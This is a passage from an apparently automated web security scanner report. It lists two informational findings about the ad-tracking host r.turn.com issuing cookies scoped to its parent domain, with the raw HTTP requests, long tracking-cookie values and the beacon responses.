Q7Z19PwLp1_APilk3LxHIqi5G66d8e_Z2cttmvTBWPAwvjWXHUfoLAQIZBbvbOhN6bREB_SWupoTcy14leZYRR7uP8E2pWNOdbM6oDzpMYKXjYhY4TLX48ZxcpEi0fIE7tOoo9uHkNvFNmNnM23DFeCFVuTjHka8m_2046CrJExuL1gg3GmsPZlMaV4X8N_6aHpYtroERlavtLZfEjz7mA1A0AfxCzqqnQSvo_Cvx-wKsT0cw; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

12.120. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:29 GMT; Path=/
pf=rJtRH_Zk3Crgq3XrNxM5uHEqiyLWvlhwjvnX8-W77V4x5j1rYCkdVRP2UaaYhxkUxhx5ALNZJagJ4MhMImSgOyt6QGZFXBO1NvJY7BqIKHZhvO5ig4C655IEHyqLyfEUFlkMz3gvg7tzZ65ieMRHYYmASOVQBnblqHIXcnFE8uEYYUySe878HncxgdgOdj92jl0rNHL5EpMmdOK3tFHbYcKYx7giuKqnJGUA2_kwifla82yQ3ARkjvlrTKVFQLW_VUJXNqxcPjaaIsmLsBYi_IFuP6ulkaWyvPg7ZCq6J8Sm58lMqwfI2GvVIEz4WwfISPKpzpOADOvDXTfruF0alDxO4DpGIPHqQsHlcKTQP_6t_mnmmMSqRxtrra7L27k8He5W6LJiN_5zagqr-v56q6vwUm7lgp1ObdHANNybCRR3ZMlqCglAFAZZpg_M4EsDXsaip8JZMWQiFy7084RgdBxS4jS6IstDV4pJ8-n_-6W6QeiG4mh_YsXE5a8jCvgqlMsemxKiaCnXl_GqgNvYs0B3SVwVOr3C6PTRdRykLl2iOA0QIyniWC75o4jPDSb6baJelTYQciNR7KUdBGuKphvrAV6VQlu0Lcrpp_zSva1EtN-BuZEVp80k4PmkN_gFT-0aLPu67tXdfrImPEaGxrLIgqy0HrJSnCOmesnJHs-iyClqPR6i_k6wNNO3DELQr_uIdOrnpxEKEs-Pk70xbyVMkCnwjQLr3BhyqdpEqAmw1EG4HhJkcxQudw6muujB96NlR8cKCFB5b8yH-pAF-mxRgFAjFQHwBahwKdWu4ip8fc5C4_glMUDVwxYyhOp8tzU93SuQ7nqi9tHAkdJN5ShSi2_S0ZBzvsnlEtnNkBKRFHfA7aVFPwCQo5sX_MQSkbAmFVP5zHlSQkeurscnCCa3KSLwD6FHUmhYkRD3kZ2DDxNnHBh_vaMBlaGMOoGiOP9lVr3_n1bFKy78DHYEOoRkkyOYsQ0PbNgsm751fELW-fiq__5eo7ylPnldi2Bi3SK-TvN7k9vrOkW_afxQblylfBQR4N29DHAz6s-YyJmoHE8ApAwt-kHxIo-kX64rftT8TEPyntWofHiv9gsugLEkwQaet3sIO9GGUlvQx5D5kYn6xS0x3Os1_-TyxwIMVeEuUt36_YfGhy_wZQGCzqHs9-R7LSr4Do5Mz8ot93SyloXowYUrzIwjbiWVu0QENn7QjXgaQvvqTx85Mwdm4yDTB6Zn1F_DCC3c80LxMwD3FWPqzrOYdv9QuGsosjGMc_hL3i14FfV2kUxpXbXvdNe0m-E7pddLAWU1WSKM0t6oIHj0ZyVfxzasgiFBZa4PEoPenkETQGmKRNO3UUUIMcPfmJjMAO_zDX3Rgpr4fJx5b7T_BE1CYU53q09WJSHhYfaXNQ9ylSf0-ANS40O_0EDXFQMkdTiFRKAitR0ED9nnbf1aAiZ1mXyIuy6pv27WjNkjULv8DSLA8OtfInB5hP32cnVXyr_f-8VDR4bfJ5pB3KpP7reQd0b5fGjrZoX6DdoTW0lCYYEnb4vKPJGv4Q; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=dgreSKR1l3-fFqwVrhKk2fFaNoS5G6K4DRLGa89Io1jPVx7awJtIT5bFbQ7adJJ3pFdSCXahzXLc-TDDfVb0Sw&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rv=1; rrs=6%7C9%7C1002%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C1001%7C1004; rds=15116%7C15110%7C15128%7C15110%7C15110%7C15112%7C15110%7C15110%7C15116%7C15110%7C15115%7C15110%7C15110%7C15110; uid=4325897289836481830; adImpCount=CuIdyNnNbsd8IFR5CESMwk5_AoqRQoxQlknjNiZmToHG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6Ye8sHu_4bGJr09YnZmqiqYnTG8vXtMcexI5g_6ntO2wVudVjXv710qx_I9zopHzosdGJ7AS1T6b5wiqmkpXpXdnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlIctgzop7L7m_ggs3PS7FLE0J_7oKjjzxbQbmixkRIYsHgcoS23WeHIgf_ApGB4ffykrPnoMmRtmOJTHuT4TLZswcYgCM7hKMCgsWzWU7StbEax1et2JxE0L6wqLjDdN2PjxtpnGLlrQ_v1_iIsNK3YbLvHH5DlZJnRA5TSggml5Vkx5hzJv_ogNmMnEecKQZ9TLZm6WlDbMzjxLwgMw3CMh3l1YEzqVjRPlCzU3sWqfGD3wSmKO4ttba9K0UuGWbDgtU7dib_VO4FYHBtZpXpxtgrDqQSfnHriEQfizDMop5Nlbka3cRHmW8JQbh5rTTYem1Og1flGKbh_GovT30ECBf74GlYyuvK9KnnIK8apm8pSycih6imKgjYngGQOdM2V7ruefAgc2DnSqRyDQHo09zZyCvywlaxJzfgdiIDDEbcEKy81Pxn5UwuWEd2NKdFk_cv5dlDFn-C7tAFxoeY4T7tyHWJjTSDIaJ1V_RMz19-GhRUIjuqdf6tJnR1NsAxe1z9ss6NXEdoBdHz1XXKNDOG1brXgeroIzd4C80BOQ5jllwylPntI0EFsF2fygOKzQfzs6tcbyLYy_I5kqleHXpcp61V_C97XLclj0PfNXbkGgVVrmLrpBl0wPQu0ZWN9PsRCwdrigvWm3hew5vSwfUn8cfIJteWX0KbGv_oMQyUSDxON3ZpXzbrcCtDhr1CrDQNprqT6LTvPSdTOxkAnyY7UhaqUCgmiIsYjYAfluMNhNF6QvDKF3FAvRLyyKgxwPafVsNCGDp8FUznCm_OeYPXW6COfNgsXeriVOqmy6A8g1H80g-BazvB_U5pzrNj2VtuePwYbxARyfSM0IxpDwROKZjbMK9VuySUPZ58x4b-T7KW5NHyxpI3gL4kr15i9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIkeIetYnnl8gEyAgKZsW3xt6Dp_PeiyOD9QEUIwytD75uv-icKe0iPEBilltibzylcftZtsmjbDphE8x5XJBiuHH7WbbJo2w6YRPMeVyQYrhx-1m2yaNsOmETzHlckGK4cDq2CEfDid4wszbuaXE_TN0eUuYzj60ncUd4EVOJsejdHlLmM4-tJ3FHeBFTibHo3R5S5jOPrSdxR3gRU4mx6ITxCe407s0emJ3U9w9WXXkoTRX2fSbc7i_OzYNa_f3daWr1xXE0MIDwS9tWvxZrnGhxCyOEwJ6UEOxJDdP_5dhocQsjhMCelBDsSQ3T_-XYaHELI4TAnpQQ7EkN0__l2LzzRIHgCvOQow5SgLAWHHexSsvN7MDtJFV6wRit1nx5; fc=MWp4cE5jbv0XEkz_Ctovfc4qcg9-bn9SwzG9UG7pVfH7Nj5bGHqXk2A06xn0orl8mNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rST9NoqOhx59MhzvvL9oVqmIEEoaWdqdoBsvj70rBbRHxkrMB3cW0HroQP3xwOFfJNfuj8s2SsJjw03czPperUqzHVjXTBrUPRIETuoZhexzc; pf=3R3SKUUPFCoio1bGZvjNrz90sCTbjJoMGNRY49lN3lkdCPfTl6GVwLxMGMWABO2Hxhx5ALNZJagJ4MhMImSgO1j9Fw_ghz_PVAPwGCUX-93yzKimGqsD0iB4nMRqsP7Fo2p_sYe6FK71YFv8XCcCotMv9o6pa5vGMMnD4OdosTAdkTDGhgbOPz347HKULaPudC7UMMqtU-uTINCqeO5OuEL9QOcm54oK_vUb9hh6U2buGh5RH_9bIiRxjGlPA1strChLkPILqDevF3_ytWn-kDXnP7WTJzn5hC7GC86BA-XH4AovFAW5wYg3d6HNexkTzFpNF3hh_ymVCgGfBkee1knPZNXIe9A8BgTIbvpehe-k2s4kcWWbQbjBvv9DiSP3qKDEyZKkj9qg203fyq2TFtojUIBz8h_-Icn9K-ai00y2wJhpV1cKL0hO0j9B54GVhm47us_Csn3kHJ43JP-qHSBc4w9COMv7vDAXkl7P7uNQSKyLC2RsYFceW-v9Ivp_YD2RLpMpzj0AYE_Zac9hK_NAdWBQHVl-JPRF5hS10YO-4pC3ilKbQpP5MzC5Uc_kTeP1VDFWEeG9aPxYlZoS7h6d7CFXLgzFaAgYaTkStmC-QV4C2xn7TxBeOjVll9oOUmyWQqI6LTbGJiqxEuhQYn8rJzZ-n49wBvicimKkWWRsjPuConU0rTmVj5rk3Zs478f5w22ir_fCTLujc_dkGDf0XNwyIx4tuYj5ActmcnGU_ut7QWRoiVW-tzSSU50x81pN6PeKUPuttBCxxLR0bEXGPVB-KlOMchJXjiQA7q3qw9rqhVwrLsR04UQUf7H1SHNsnfeE9yPoFSHW8Ezu0u0_r320et_4BxanRu3aW6Od71gQ6z-o93xNve-0ihCBKuKRbYoeHkykGEWzpMqgE9YnGohfIt52_gTsgQl00yAdh_1PkFeE4BUm4Q3ZCHxVw0-Ht2JclSnzBdXwhsQ8i70yFd1p7EY1gmjobjhbl8py5vR-6hrOrfCxLuN-5IAUz5HNvuzTEFxauVGTueM8Vp8as4FPdyDpeeEni4cNLaW7CdLTrgTa3qKWD-Da3R0DjXbBpZz989wk0yGmAtqC-6oLvpO-g-SUTn1I2hqfIKAwJ3K0R_C6aRCJA-6dRcmmRsm2dg998jlQIlrO-XAkIu866aiXxhF5vdmmj1Eq8cbMUvEoglbvObqHTXsaSeX3eyilQCKGOvUGrC3yg6quWbT2J4_FGa1rnHzs2HLwdHSIZhxNbxZ4Mnp1HWQFNlPcrJU_yok8WE0ucKkz3qneksiNhOxeYM51PbZBqQ7Z19PwLp1_APilk3LxHIqi5G66d8e_Z2cttmvTBWPAwvjWXHUfoLAQIZBbvbOhN6bREB_SWupoTcy14leZYRR7uP8E2pWNOdbM6oDzpMYKXjYhY4TLX48ZxcpEi0fIE7tOoo9uHkNvFNmNnM23DFeCFVuTjHka8m_2046CrJExuL1gg3GmsPZlMaV4X8N_6aHpYtroERlavtLZfEjz7mA1A0AfxCzqqnQSvo_Cvx-wKsT0cw

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:29 GMT; Path=/
Set-Cookie: pf=rJtRH_Zk3Crgq3XrNxM5uHEqiyLWvlhwjvnX8-W77V4x5j1rYCkdVRP2UaaYhxkUxhx5ALNZJagJ4MhMImSgOyt6QGZFXBO1NvJY7BqIKHZhvO5ig4C655IEHyqLyfEUFlkMz3gvg7tzZ65ieMRHYYmASOVQBnblqHIXcnFE8uEYYUySe878HncxgdgOdj92jl0rNHL5EpMmdOK3tFHbYcKYx7giuKqnJGUA2_kwifla82yQ3ARkjvlrTKVFQLW_VUJXNqxcPjaaIsmLsBYi_IFuP6ulkaWyvPg7ZCq6J8Sm58lMqwfI2GvVIEz4WwfISPKpzpOADOvDXTfruF0alDxO4DpGIPHqQsHlcKTQP_6t_mnmmMSqRxtrra7L27k8He5W6LJiN_5zagqr-v56q6vwUm7lgp1ObdHANNybCRR3ZMlqCglAFAZZpg_M4EsDXsaip8JZMWQiFy7084RgdBxS4jS6IstDV4pJ8-n_-6W6QeiG4mh_YsXE5a8jCvgqlMsemxKiaCnXl_GqgNvYs0B3SVwVOr3C6PTRdRykLl2iOA0QIyniWC75o4jPDSb6baJelTYQciNR7KUdBGuKphvrAV6VQlu0Lcrpp_zSva1EtN-BuZEVp80k4PmkN_gFT-0aLPu67tXdfrImPEaGxrLIgqy0HrJSnCOmesnJHs-iyClqPR6i_k6wNNO3DELQr_uIdOrnpxEKEs-Pk70xbyVMkCnwjQLr3BhyqdpEqAmw1EG4HhJkcxQudw6muujB96NlR8cKCFB5b8yH-pAF-mxRgFAjFQHwBahwKdWu4ip8fc5C4_glMUDVwxYyhOp8tzU93SuQ7nqi9tHAkdJN5ShSi2_S0ZBzvsnlEtnNkBKRFHfA7aVFPwCQo5sX_MQSkbAmFVP5zHlSQkeurscnCCa3KSLwD6FHUmhYkRD3kZ2DDxNnHBh_vaMBlaGMOoGiOP9lVr3_n1bFKy78DHYEOoRkkyOYsQ0PbNgsm751fELW-fiq__5eo7ylPnldi2Bi3SK-TvN7k9vrOkW_afxQblylfBQR4N29DHAz6s-YyJmoHE8ApAwt-kHxIo-kX64rftT8TEPyntWofHiv9gsugLEkwQaet3sIO9GGUlvQx5D5kYn6xS0x3Os1_-TyxwIMVeEuUt36_YfGhy_wZQGCzqHs9-R7LSr4Do5Mz8ot93SyloXowYUrzIwjbiWVu0QENn7QjXgaQvvqTx85Mwdm4yDTB6Zn1F_DCC3c80LxMwD3FWPqzrOYdv9QuGsosjGMc_hL3i14FfV2kUxpXbXvdNe0m-E7pddLAWU1WSKM0t6oIHj0ZyVfxzasgiFBZa4PEoPenkETQGmKRNO3UUUIMcPfmJjMAO_zDX3Rgpr4fJx5b7T_BE1CYU53q09WJSHhYfaXNQ9ylSf0-ANS40O_0EDXFQMkdTiFRKAitR0ED9nnbf1aAiZ1mXyIuy6pv27WjNkjULv8DSLA8OtfInB5hP32cnVXyr_f-8VDR4bfJ5pB3KpP7reQd0b5fGjrZoX6DdoTW0lCYYEnb4vKPJGv4Q; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:29 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 13 Jun 2011 11:02:29 GMT

GIF89a.............!.......,...........D..;

12.121. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:15:03 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=zW_MQLu_9f.zvSJx2mqLKWDG HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=CuIdyNnNbsd8IFR5CESMwk5_AoqRQoxQlknjNiZmToHG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6Ye8sHu_4bGJr09YnZmqiqYnTG8vXtMcexI5g_6ntO2wVudVjXv710qx_I9zopHzosdGJ7AS1T6b5wiqmkpXpXdnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlIctgzop7L7m_ggs3PS7FLE0J_7oKjjzxbQbmixkRIYsHgcoS23WeHIgf_ApGB4ffykrPnoMmRtmOJTHuT4TLZswcYgCM7hKMCgsWzWU7StbEax1et2JxE0L6wqLjDdN2PjxtpnGLlrQ_v1_iIsNK3YbLvHH5DlZJnRA5TSggml5Vkx5hzJv_ogNmMnEecKQZ9TLZm6WlDbMzjxLwgMw3CMh3l1YEzqVjRPlCzU3sWqfGD3wSmKO4ttba9K0UuGWbDgtU7dib_VO4FYHBtZpXpxtgrDqQSfnHriEQfizDMop5Nlbka3cRHmW8JQbh5rTTYem1Og1flGKbh_GovT30ECBf74GlYyuvK9KnnIK8apm8pSycih6imKgjYngGQOdM2V7ruefAgc2DnSqRyDQHo09zZyCvywlaxJzfgdiIDDEbcEKy81Pxn5UwuWEd2NKdFk_cv5dlDFn-C7tAFxoeY4T7tyHWJjTSDIaJ1V_RMz19-GhRUIjuqdf6tJnR1NsAxe1z9ss6NXEdoBdHz1XXKNDOG1brXgeroIzd4C80BOQ5jllwylPntI0EFsF2fygOKzQfzs6tcbyLYy_I5kqleHXpcp61V_C97XLclj0PfNXbkGgVVrmLrpBl0wPQu0ZWN9PsRCwdrigvWm3hew5vSwfUn8cfIJteWX0KbGv_oMQyUSDxON3ZpXzbrcCtDhr1CrDQNprqT6LTvPSdTOxkAnyY7UhaqUCgmiIsYjYAfluMNhNF6QvDKF3FAvRLyyKgxwPafVsNCGDp8FUznCm_OeYPXW6COfNgsXeriVOqmy6A8g1H80g-BazvB_U5pzrNj2VtuePwYbxARyfSM0IxpDwROKZjbMK9VuySUPZ58x4b-T7KW5NHyxpI3gL4kr15i9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIkeIetYnnl8gEyAgKZsW3xt6Dp_PeiyOD9QEUIwytD75uv-icKe0iPEBilltibzylcftZtsmjbDphE8x5XJBiuHH7WbbJo2w6YRPMeVyQYrhx-1m2yaNsOmETzHlckGK4cDq2CEfDid4wszbuaXE_TN0eUuYzj60ncUd4EVOJsejdHlLmM4-tJ3FHeBFTibHo3R5S5jOPrSdxR3gRU4mx6ITxCe407s0emJ3U9w9WXXkoTRX2fSbc7i_OzYNa_f3daWr1xXE0MIDwS9tWvxZrnGhxCyOEwJ6UEOxJDdP_5dhocQsjhMCelBDsSQ3T_-XYaHELI4TAnpQQ7EkN0__l2LzzRIHgCvOQow5SgLAWHHexSsvN7MDtJFV6wRit1nx5; fc=MWp4cE5jbv0XEkz_Ctovfc4qcg9-bn9SwzG9UG7pVfH7Nj5bGHqXk2A06xn0orl8mNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rST9NoqOhx59MhzvvL9oVqmIEEoaWdqdoBsvj70rBbRHxkrMB3cW0HroQP3xwOFfJNfuj8s2SsJjw03czPperUqzHVjXTBrUPRIETuoZhexzc; pf=3R3SKUUPFCoio1bGZvjNrz90sCTbjJoMGNRY49lN3lkdCPfTl6GVwLxMGMWABO2Hxhx5ALNZJagJ4MhMImSgO1j9Fw_ghz_PVAPwGCUX-93yzKimGqsD0iB4nMRqsP7Fo2p_sYe6FK71YFv8XCcCotMv9o6pa5vGMMnD4OdosTAdkTDGhgbOPz347HKULaPudC7UMMqtU-uTINCqeO5OuEL9QOcm54oK_vUb9hh6U2buGh5RH_9bIiRxjGlPA1strChLkPILqDevF3_ytWn-kDXnP7WTJzn5hC7GC86BA-XH4AovFAW5wYg3d6HNexkTzFpNF3hh_ymVCgGfBkee1knPZNXIe9A8BgTIbvpehe-k2s4kcWWbQbjBvv9DiSP3qKDEyZKkj9qg203fyq2TFtojUIBz8h_-Icn9K-ai00y2wJhpV1cKL0hO0j9B54GVhm47us_Csn3kHJ43JP-qHSBc4w9COMv7vDAXkl7P7uNQSKyLC2RsYFceW-v9Ivp_YD2RLpMpzj0AYE_Zac9hK_NAdWBQHVl-JPRF5hS10YO-4pC3ilKbQpP5MzC5Uc_kTeP1VDFWEeG9aPxYlZoS7h6d7CFXLgzFaAgYaTkStmC-QV4C2xn7TxBeOjVll9oOUmyWQqI6LTbGJiqxEuhQYn8rJzZ-n49wBvicimKkWWRsjPuConU0rTmVj5rk3Zs478f5w22ir_fCTLujc_dkGDf0XNwyIx4tuYj5ActmcnGU_ut7QWRoiVW-tzSSU50x81pN6PeKUPuttBCxxLR0bEXGPVB-KlOMchJXjiQA7q3qw9rqhVwrLsR04UQUf7H1SHNsnfeE9yPoFSHW8Ezu0u0_r320et_4BxanRu3aW6Od71gQ6z-o93xN